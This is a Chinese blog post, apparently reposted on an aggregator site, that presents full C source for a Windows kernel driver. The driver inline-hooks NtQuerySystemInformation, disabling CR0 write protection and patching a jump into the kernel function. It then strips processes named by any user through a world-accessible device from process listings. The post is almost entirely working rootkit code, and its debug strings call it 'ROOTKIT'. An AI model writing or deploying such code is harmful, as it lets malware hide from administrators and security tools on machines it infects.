?上次是SSDT??HOOK 方式 隱藏 進(jìn)程 ，如鏈接：http://blog.csdn.net/hjxyshell/article/details/16993119

這次是InlineHook 方式隱藏進(jìn)程，這里inline hook的原理就不做詳細(xì)介紹了，網(wǎng)上相關(guān)資源較多，擼主主要參考看雪的某大牛的“詳談內(nèi)核三步走Inline Hook實(shí)現(xiàn)”（http://bbs.pediy.com/showthread.php?t=98493）

中間有一些關(guān)于進(jìn)程的枚舉的處理，上次寫了個(gè)簡單的代碼：http://blog.csdn.net/hjxyshell/article/details/17312119

代碼如下：

?

[cpp]?view plaincopy

#include?<ntddk.h>??

#include?<Wdmsec.h>????

#include?<Wdm.h>????

??

//定義控制碼????

#define?MY_DVC_IN_CODE?\??

????????(ULONG)CTL_CODE(FILE_DEVICE_UNKNOWN,\??

????????????????0xa02,\??

????????????????METHOD_BUFFERED,\??

????????????????FILE_READ_DATA|FILE_WRITE_DATA)??

??

//隱藏進(jìn)程鏈表相關(guān)變量??

//存放要隱藏進(jìn)程的名字鏈表????

typedef?struct?_ProcNameLink????

{????

????UNICODE_STRING?ProcName;????

????struct?_ProcNameLink?*pNext;????

}ProcNameLink,*pProcNameLink;??

??

pProcNameLink?pProcNameHeader;??//鏈表頭部????

pProcNameLink?pProcNameTail;???//鏈表尾部???

//字節(jié)型數(shù)據(jù)??unsigned?char??

typedef?unsigned?char?BYTE;??

ULONG??CR0VALUE;???????????????????????//設(shè)置cr0的讀寫標(biāo)識(shí)??

BYTE??OriginalBytes[5]={0};?????????????//保存原始函數(shù)前五個(gè)字節(jié)?????????????

BYTE?JmpAddress[5]={0xE9,0,0,0,0};???????//跳轉(zhuǎn)到HOOK函數(shù)的地址??

??

//進(jìn)程線程?信息??結(jié)構(gòu)體??

struct?_SYSTEM_THREADS????

{????

????????LARGE_INTEGER???????????KernelTime;????

????????LARGE_INTEGER???????????UserTime;????

????????LARGE_INTEGER???????????CreateTime;????

????????ULONG???????????????????????????WaitTime;????

????????PVOID???????????????????????????StartAddress;????

????????CLIENT_ID???????????????????????ClientIs;????

????????KPRIORITY???????????????????????Priority;????

????????KPRIORITY???????????????????????BasePriority;????

????????ULONG???????????????????????????ContextSwitchCount;????

????????ULONG???????????????????????????ThreadState;????

????????KWAIT_REASON????????????WaitReason;????

};????

//進(jìn)程信息結(jié)構(gòu)體????

struct?_SYSTEM_PROCESSES????

{????

????????ULONG???????????????????????????NextEntryDelta;????

????????ULONG???????????????????????????ThreadCount;????

????????ULONG???????????????????????????Reserved[6];????

????????LARGE_INTEGER???????????????????CreateTime;????

????????LARGE_INTEGER???????????????????UserTime;????

????????LARGE_INTEGER???????????????????KernelTime;????

????????UNICODE_STRING??????????????????ProcessName;????

????????KPRIORITY???????????????????????BasePriority;????

????????ULONG???????????????????????????ProcessId;????

????????ULONG???????????????????????????InheritedFromProcessId;????

????????ULONG???????????????????????????HandleCount;????

????????ULONG???????????????????????????Reserved2[2];????

????????VM_COUNTERS?????????????????????VmCounters;????

????????IO_COUNTERS?????????????????????IoCounters;?//windows?2000?only????

????????struct?_SYSTEM_THREADS??????????Threads[1];????

};????

??

//原函數(shù)，獲取進(jìn)程（系統(tǒng)）相關(guān)信息??

NTSYSAPI????

NTSTATUS????

NTAPI?NtQuerySystemInformation(????

????????????????????????IN?ULONG?SystemInformationClass,????

????????????????????????OUT?PVOID?SystemInformation,????

????????????????????????IN?ULONG?SystemInformationLength,????

????????????????????????OUT?PULONG?ReturnLength????

????????????????????????????);??

NTSTATUS??

MyNtQuerySystemInformation(??

????????????????????????IN?ULONG?SystemInformationClass,??

????????????????????????OUT?PVOID?SystemInformation,??

????????????????????????IN?ULONG?SystemInformationLength,??

????????????????????????OUT?PULONG?ReturnLength??

????????????????????????????);??

??

//改變函數(shù)前五個(gè)字節(jié)，使其跳到MyNtQuerySystemInformation函數(shù)中?????????????????????????????

void?HookNtQuerySystemInformation(??

????????????????????//??IN?ULONG?SystemInformationClass,??

????????????????????//??OUT?PVOID?SystemInfotmation,??

????????????????????//??IN?ULONOG?SystemInformatonLength,??

????????????????????//??OUT?PULONG?ReturnLength??

????????????????????????????????)??

{??

????//賦值前面的數(shù)組??

????KIRQL?Irql;??

????DbgPrint("[NtQuerySystemInformation]:?0x%x",NtQuerySystemInformation);??

????//保存原函數(shù)前5個(gè)字節(jié)??

????RtlCopyMemory(OriginalBytes,(BYTE*)NtQuerySystemInformation,5);??

????//保存新函數(shù)5個(gè)字節(jié)自后的偏移??

????*(ULONG*)(JmpAddress?+?1)?=?(ULONG)MyNtQuerySystemInformation?-?((ULONG)NtQuerySystemInformation+5);??

????//開始inline?hook??即將跳轉(zhuǎn)到新函數(shù)指令拷貝到原函數(shù)前5個(gè)字節(jié)??

????//關(guān)閉內(nèi)存寫保護(hù)??

????__asm??

????{??

????//這里只用到eax，保存eax即可??

????push?eax??

????mov?eax,cr0??

????mov?CR0VALUE,eax??

????and?eax,0fffeffffh??

????mov?cr0,eax??

????pop?eax??

????}??

????//提升IRQL中斷級(jí)（防止寫的過程中出新中斷，導(dǎo)致出錯(cuò)）??

????Irql?=?KeRaiseIrqlToDpcLevel();??

????//開始寫函數(shù)的前5個(gè)字節(jié)(jmp?指令)??

????RtlCopyMemory((BYTE*)NtQuerySystemInformation,JmpAddress,5);??

????//恢復(fù)Irql??

????KeLowerIrql(Irql);??

????//開啟內(nèi)存寫保護(hù)??

????__asm??

????{??

????push?eax??

????mov?eax,CR0VALUE??

????mov?cr0,eax??

????pop?eax??

????}??

??????

}??

//取消inline?hook??

void?UnHookNtQuerySystemInformation(??

????????????????????//??IN?ULONG?SystemInformationClass,??

????????????????????//??OUT?PVOID?SystemInfotmation,??

????????????????????//??IN?ULONOG?SystemInformatonLength,??

????????????????????//??OUT?PULONG?ReturnLength??

????????????????????????????????)??

{??

????//把保存的五個(gè)字節(jié)寫回原函數(shù)??

????KIRQL?Irql;??

????//關(guān)閉寫保護(hù)??

????__asm??

????{??

????????push?eax??

????????mov?eax,cr0??

????????mov?CR0VALUE,eax??

????????and?eax,0fffeffffh??

????????mov?cr0,eax??

????????pop?eax??

????}??

????//提升IRQL?到?Dpc??

????Irql?=?KeRaiseIrqlToDpcLevel();??

????RtlCopyMemory((BYTE*)NtQuerySystemInformation,OriginalBytes,5);??

????KeLowerIrql(Irql);??

????//開啟內(nèi)存寫保護(hù)??

????__asm??

????{??

????push?eax??

????mov?eax,CR0VALUE??

????mov?cr0,eax??

????pop?eax??

????}??

}??

//原函數(shù)??

_declspec?(naked)?NTSTATUS?OriginalNtQuerySystemInformation(??

????????????????????????????????????????IN?ULONG?SystemInformationClass,??

????????????????????????????????????????OUT?PVOID?SystemInfotmation,??

????????????????????????????????????????IN?ULONG?SystemInformatonLength,??

????????????????????????????????????????OUT?PULONG?ReturnLength??

????????????????????????????????????????????????????????????)??

{??

????__asm{??

????????//這里的eax不是隨便使用個(gè)寄存器就行的，因?yàn)?/span>??

????????//隨便使用個(gè)寄存器很可能會(huì)破壞原來的值??

????????//因?yàn)閑ax的值在接下來會(huì)直接被覆蓋（原來的值是什么不重要了），所以這里可以使用??

????????push?210h??

????????mov?eax,NtQuerySystemInformation??

????????add?eax,5??

????????jmp?eax??

????????}?????????

}??

??

//MyNtQuerySystemInformation函數(shù)，再此處?進(jìn)行進(jìn)程隱藏處理??

NTSTATUS??

MyNtQuerySystemInformation(??

????????????????????????IN?ULONG?SystemInformationClass,??

????????????????????????OUT?PVOID?SystemInformation,??

????????????????????????IN?ULONG?SystemInformationLength,??

????????????????????????OUT?PULONG?ReturnLength??

????????????????????????????)??

{??

????????NTSTATUS?ntStatus;??

????????pProcNameLink?pTempLink;??//進(jìn)程查詢時(shí)使用??

????????//DbgPrint("it's?here!!!\n");??

????????//查詢系統(tǒng)信息??

????????ntStatus?=?OriginalNtQuerySystemInformation(??

????????????????????????????????????????????SystemInformationClass,??

????????????????????????????????????????????SystemInformation,??

????????????????????????????????????????????SystemInformationLength,??

????????????????????????????????????????????ReturnLength??

????????????????????????????????????????????????????);??

????????if(NT_SUCCESS(ntStatus))??

????????{??

????????????if(SystemInformationClass?==?5)??

????????????{??

????????????????//獲取進(jìn)程信息結(jié)構(gòu)??

????????????????for((pTempLink?=?pProcNameHeader->pNext)&&(pTempLink?!=?NULL);pTempLink?!=NULL;)??

????????????????{??

????????????????????//每次查看時(shí)?，都從進(jìn)程的列表開始查看??

????????????????????struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;??

????????????????????struct?_SYSTEM_PROCESSES?*prev?=?NULL;??

????????????????????while(curr)??

????????????????????{??

????????????????????????if(curr->ProcessName.Buffer?!=?NULL)??

????????????????????????{??

????????????????????????????if(0?==?memcmp(curr->ProcessName.Buffer,pTempLink->ProcName.Buffer,16))?//判斷是否為要隱藏的進(jìn)程??

????????????????????????????{??

????????????????????????????????//判斷眼隱藏的進(jìn)程在鏈表的那個(gè)位置??

????????????????????????????????if(prev)?//中間或最后??

????????????????????????????????{??

????????????????????????????????????if(curr->NextEntryDelta)????

????????????????????????????????????????prev->NextEntryDelta?+=?curr->NextEntryDelta;????

????????????????????????????????????else????//?在最后????

????????????????????????????????????????prev->NextEntryDelta?=?0;????

????????????????????????????????}??

????????????????????????????????else????

????????????????????????????????{????

????????????????????????????????????if(curr->NextEntryDelta)????

????????????????????????????????????{????

????????????????????????????????????????//?要隱藏的進(jìn)程在第一個(gè)????

????????????????????????????????????????(char?*)SystemInformation?+=?curr->NextEntryDelta;????

????????????????????????????????????}????

????????????????????????????????????else?//?只有當(dāng)前一個(gè)進(jìn)程????

????????????????????????????????????????SystemInformation?=?NULL;????

????????????????????????????????}????

????????????????????????????}??

????????????????????????}??

????????????????????????prev?=?curr;????

????????????????????????if(curr->NextEntryDelta)?????

????????????????????????????(char?*)curr?+=?curr->NextEntryDelta;????

????????????????????????else?????

????????????????????????????curr?=?NULL;??????????????????????

????????????????????}??

?????????????????pTempLink?=?pTempLink->pNext;??

????????????????}?????

????????????}??

????????}?????????????????????????????????

????return?ntStatus;??

????//return?1;??

}??

//向鏈表匯總加入新的要隱藏的進(jìn)程????

VOID?AddProcToLink(PUNICODE_STRING?ProcName)????

{????

????//先判斷該進(jìn)程是否已存在，已存在則不添加(不判斷也不影響結(jié)果)????

????pProcNameLink?pNewLink?=?(pProcNameLink)ExAllocatePool(NonPagedPool,?sizeof(ProcNameLink));??//新增節(jié)點(diǎn)????

????(pNewLink->ProcName).Length?=?0;????

????(pNewLink->ProcName).MaximumLength?=?256;????

????(pNewLink->ProcName).Buffer?=?(PWCHAR)ExAllocatePool(NonPagedPool,?256);??//新增節(jié)點(diǎn)????

????????

????RtlCopyUnicodeString(&(pNewLink->ProcName),ProcName);??//復(fù)制????

????pNewLink->pNext?=?NULL;????

????pProcNameTail->pNext?=?pNewLink;????

????pProcNameTail?=?pNewLink;????//鏈表末尾????

}????

//移除某個(gè)進(jìn)程????

VOID?RmProcFromLink(PUNICODE_STRING?pProcName)????

{????

????pProcNameLink?pNewLink?=?pProcNameHeader;????

????if(pProcNameHeader->pNext?==?NULL)????

????????return;????

????for(?pNewLink;pNewLink->pNext?!=?NULL;)????

????{????

????????//找到，則從鏈表中刪除????

????????if(RtlCompareUnicodeString(&(pNewLink->pNext->ProcName),pProcName,TRUE)==0)????

????????{????

????????????pNewLink->pNext?=?pNewLink->pNext->pNext;????

????????????if(pNewLink->pNext?==?NULL)??//鏈表結(jié)尾，為指針標(biāo)識(shí)賦值????

????????????????pProcNameTail?=?pNewLink;????

????????????break;????

????????}????

????????pNewLink?=?pNewLink->pNext;??//沒有寫在for里面是為了方便調(diào)試時(shí)下斷點(diǎn)????

????}????

????

}????

//卸載驅(qū)動(dòng)??

VOID?OnUnload(IN?PDRIVER_OBJECT?driver)????

{????

????UNICODE_STRING?symblink_name;??//c語言定義變量放在前面????

????DbgPrint("ROOTKIT:?OnUnload?called\n");????

???//?unhook?ZwQuerySystemInformation????

????UnHookNtQuerySystemInformation();??

??????

????if(IoIsWdmVersionAvailable(1,0x10))????

????{????

????????//支持通用版本本，則創(chuàng)建全局符號(hào)鏈接\DosDevices\Global????

????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\Global\\testSL");???????????

????}????

????else????

????{????

????????//不支持，用\DosDevices????

????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\testSL");????

????}????

????IoDeleteSymbolicLink(&symblink_name?);????

????IoDeleteDevice(driver->DeviceObject);????

????DbgPrint("our?driver?is?unloading?...?\r\n");????

}????

//分發(fā)函數(shù)??

NTSTATUS?MyDispatchFunction(PDEVICE_OBJECT?device,?PIRP?irp)????

{????

????CHAR?inBuffer[256];????

????short?flag?=?1;??//增加鏈表????

????ANSI_STRING?ansiBuffer;????

????UNICODE_STRING?unicodeBuffer;????

????int?i;????

????//獲得當(dāng)前IRP調(diào)用的棧空間????

????PIO_STACK_LOCATION?irpsp?=?IoGetCurrentIrpStackLocation(irp);????

????NTSTATUS?status?=?STATUS_INVALID_PARAMETER;????

????memset(inBuffer,0,256);????

????//處理各種請(qǐng)求????

????switch(irpsp->MajorFunction)????

????{????

????????case?IRP_MJ_CREATE:????

????????{????

????????????//簡單返回一個(gè)IRP成功三部曲????

????????????irp->IoStatus.Information?=?0;????

????????????irp->IoStatus.Status?=?STATUS_SUCCESS;????

????????????IoCompleteRequest(irp,IO_NO_INCREMENT);????

????????????//應(yīng)用層，打開設(shè)備后?打印此字符串，僅為測(cè)試????

????????????DbgPrint("congratulations?gay,open?device");????

????????????status?=?irp->IoStatus.Status;????

????????????break;????

????????}????

????????case?IRP_MJ_CLOSE:????

????????{????

????????????irp->IoStatus.Information?=?0;????

????????????irp->IoStatus.Status?=?STATUS_SUCCESS;????

????????????IoCompleteRequest(irp,IO_NO_INCREMENT);????

????????????//應(yīng)用層，打開設(shè)備后?打印此字符串，僅為測(cè)試????

????????????DbgPrint("congratulations?gay,close?device");????

????????????status?=?irp->IoStatus.Status;????

????????????break;????

????????}????

????????case?IRP_MJ_DEVICE_CONTROL:????

????????{????

????????????//得到功能號(hào)????

????????????ULONG?code?=?irpsp->Parameters.DeviceIoControl.IoControlCode;????

????????????//得到輸入/輸出緩沖區(qū)的長度????

????????????ULONG?in_len?=?irpsp->Parameters.DeviceIoControl.InputBufferLength;????

????????????ULONG?out_len?=?irpsp->Parameters.DeviceIoControl.OutputBufferLength;????

????????????//輸入、輸出的緩沖區(qū)是公用的內(nèi)存空間的????

????????????PCHAR?buffer?=?(PCHAR)irp->AssociatedIrp.SystemBuffer;????

????????????//memcpy(inBuffer,buffer,in_len);????

????????????//將短字符轉(zhuǎn)化為寬字符????

????????????if(buffer[0]?==?'-')????

????????????????flag?=?0;????

????????????ansiBuffer.Buffer?=?buffer+1;????

????????????ansiBuffer.Length?=?ansiBuffer.MaximumLength?=?(USHORT)(in_len?-1);????

????????????RtlAnsiStringToUnicodeString(&unicodeBuffer,?&ansiBuffer,TRUE);????

????????????if(flag)????

????????????????AddProcToLink(&unicodeBuffer);???//將要隱藏的進(jìn)程加入到鏈表中????

????????????else????

????????????????RmProcFromLink(&unicodeBuffer);????

????????????DbgPrint("%ansiBuffer?=?%Z\n",&ansiBuffer);????//注意是%Z????

????????????DbgPrint("unicodeBuffer?=?%wZ\n",&unicodeBuffer);????

????????????if(code?==?MY_DVC_IN_CODE)????

????????????{????

????????????????DbgPrint("in_buffer_len?=?%d",in_len);????

????????????????DbgPrint("%s",buffer);????

????????????????//因?yàn)椴环祷匦畔?#xff0c;直接返回成功即可????

????????????????//沒有用到輸出緩沖區(qū)????

????????????????irp->IoStatus.Information?=?0;????

????????????????irp->IoStatus.Status?=?STATUS_SUCCESS;????

????????????}????

????????????else????

????????????{????

????????????????//控制碼錯(cuò)誤，則不接受請(qǐng)求，直接返回錯(cuò)誤????

????????????????//注意返回錯(cuò)誤和返回成功的區(qū)別????

????????????????irp->IoStatus.Information?=?0;????

????????????????irp->IoStatus.Status?=?STATUS_INVALID_PARAMETER;????

????????????}????

????????????IoCompleteRequest(irp,IO_NO_INCREMENT);????

????????????status?=?irp->IoStatus.Status;????

????????????break;????

????????}????

????????case?IRP_MJ_READ:????

????????{????

????????????break;????

????????}????

????????default:????

????????{????

????????????DbgPrint("unknow?request!!!");????

????????????break;????

????????}????

????}????

???????

????return?status;????

}????

//驅(qū)動(dòng)入口函數(shù)??

NTSTATUS?DriverEntry(IN?PDRIVER_OBJECT?driver,?????

?????????????????????IN?PUNICODE_STRING?reg_path)???

{??

????ULONG?i;????

????NTSTATUS?status;????

????PDEVICE_OBJECT?device;????

????//設(shè)備名????

????UNICODE_STRING?device_name?=?RTL_CONSTANT_STRING(L"\\Device\\test");????

????//符號(hào)連接名????

????UNICODE_STRING?symblink_name;????

????//隨手寫一個(gè)GUID????

????static?const?GUID?MYGUID_CLASS_MYCDO?=?????

????{?0x63542127,?0xfbbb,?0x49c8,?{?0x8b,?0xf4,?0x8b,?0x7c,?0xb5,?0xef,?0xd3,?0x9e?}?};????

//static?const?GUID?DECLSPEC_SELECTANY?MYGUID_CLASS_MYCDO?=?????

//{?0x8524767,?0x32fe,?0x4d86,?{?0x9f,?0x48,?0xa0,?0x26,?0x94,?0xec,?0x71,?0x42?}?};????

???????

????//全用戶可讀權(quán)限、寫權(quán)限????

????UNICODE_STRING?sdd1=RTL_CONSTANT_STRING(L"D:P(A;;GA;;;WD)");????

????//初始化第一個(gè)結(jié)構(gòu)體????

????pProcNameHeader?=(pProcNameLink)ExAllocatePool(NonPagedPool,?sizeof(ProcNameLink));????

????pProcNameHeader->pNext?=?NULL;????

????pProcNameTail?=?pProcNameHeader;????

????//RtlInitUnicodeString(&(pProcNameHeader->ProcName),L"");????

????//_asm?int?3????

????//生成設(shè)備????

????status?=?IoCreateDeviceSecure(????

????????????????????????????driver,????

????????????????????????????0,????

????????????????????????????&device_name,????

????????????????????????????FILE_DEVICE_UNKNOWN,????

????????????????????????????FILE_DEVICE_SECURE_OPEN,????

????????????????????????????FALSE,????

????????????????????????????&sdd1,????

????????????????????????????(LPCGUID)&MYGUID_CLASS_MYCDO,????

????????????????????????????&device????

????????????????????????????);????

????if(!NT_SUCCESS(status))????

????{????

????????DbgPrint("IoCreateDeviceSecure?failed?");????

????????return?status;????

????}????

????DbgPrint("good?job1");????

????//創(chuàng)建符號(hào)鏈接????

????if(IoIsWdmVersionAvailable(1,0x10))????

????{????

????????//支持通用版本本，則創(chuàng)建全局符號(hào)鏈接\DosDevices\Global????

????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\Global\\testSL");???????????

????}????

????else????

????{????

????????//不支持，用\DosDevices????

????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\testSL");????

????}????

????status?=?IoCreateSymbolicLink(&symblink_name,&device_name);????

????if(!NT_SUCCESS(status))????

????{????

????????DbgPrint("IoCreateSymbolicLink?failed");????

????????return?status;????

????}????

????DbgPrint("good?job2");????

????//初始化驅(qū)動(dòng)處理????

????for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)????

????{????

????????driver->MajorFunction[i]?=?MyDispatchFunction;????

????}????

???//?save?old?system?call?locations????

???//OldZwQuerySystemInformation?=(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));????

?????//?Register?a?dispatch?function?for?Unload????

????driver->DriverUnload??=?OnUnload;?????

????????

?????//?inline?hook?????

????HookNtQuerySystemInformation();??

??????????????????????????????????

???return?STATUS_SUCCESS;??????????????

???????????????????????

}??

說明：

? ? _declspec (naked) NTSTATUS OriginalNtQuerySystemInformation??函數(shù)中的寄存器不是隨便使用的，正如代碼中注釋所述一樣，這里使用eax，因?yàn)閑ax的值會(huì)被直接覆蓋，對(duì)后續(xù)程序并無影響

如圖：

?

驅(qū)動(dòng)安裝運(yùn)行后，在查看函數(shù)NtQuerySystemInformation，已經(jīng)被我們掌控

總結(jié)

以上是生活随笔為你收集整理的内核层 inlinehook 隐藏进程的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。